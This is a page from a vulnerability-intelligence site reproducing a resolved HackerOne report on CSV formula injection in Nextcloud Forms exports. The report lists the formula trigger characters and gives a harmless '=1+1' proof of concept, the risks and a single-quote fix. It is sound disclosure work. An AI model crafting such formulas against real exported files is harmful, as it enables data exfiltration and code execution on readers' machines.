Loading HuntDB...
Hunt
Vulnerability Intelligence by wss.sh
Home Daily Briefings High Impact CVEs Recent Exploits KEV Catalog GitHub Advisories Latest Updates Security News
Sign In Sign Up

Formula Injection vulnerability in CSV export feature

Medium
N
Nextcloud
Submitted None
Actions:
View on HackerOne
Reported by 6661620a

Vulnerability Details

Technical details and impact analysis

Code Injection
**Dear Nextcloud Team –** I have identified a formula injection vulnerability [1][2] in the CSV export feature of the *Forms* App. I am aware that the Forms app is not part of this bug bounty program but was advised to disclose it via hackerone anyway. **Description.** When a (n Excel-/Calc-) formula is sent as the answer for a question that uses one of the two *Response* answer types which support text input, the formula get reflected in the .csv export file without any type of sanitation. When the content of a cell starts with one of the following characters, the content will be treated as formula. - Equals to ("=") - Plus ("+") - Minus ("-") - At ("@") **Risk.** A malicious actor who is in possession of a link to a Nextcloud Form can abuse this vulnerability to exfiltrate the other participants answers from the same sheet, read local files or even execute code (in case the user who opens the document trusts the csv file and dismisses the warning). The following steps are required to reproduce the vulnerability: 1. Create a new form that has either *Short Response* or *Long Response* field and save it. 2. Visit the link and insert `=1+1` as answer 3. Download the CSV and open it either in Excel or LibreOfficeWriter {F914621} **Remediation.** To remediate it, ensure that no cells start with either of the previously mentioned operators (+,-,@,=) which initiate the formula parsing. If one of those characters is required to be the first in a cell, e.g. for a bullet points list inside an answer, it can be escaped by prepending a single quote. The single quote won't be shown in Excel or Calc but will prohibit the content from getting parsed as a formula. Cheers, Fabian #### References [1] https://owasp.org/www-community/attacks/CSV_Injection [2] https://cwe.mitre.org/data/definitions/1236.html ## Impact A malicious actor who is in possession of a link to a Nextcloud Form can abuse this vulnerability to - exfiltrate the other participants answers from the same sheet [1] - read local files or execute code (in case the user who opens the document trusts the csv file and dismisses the warning). [2] [1] https://www.notsosecure.com/data-exfiltration-formula-injection/ [2] https://www.contextis.com/en/blog/comma-separated-vulnerabilities

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Code Injection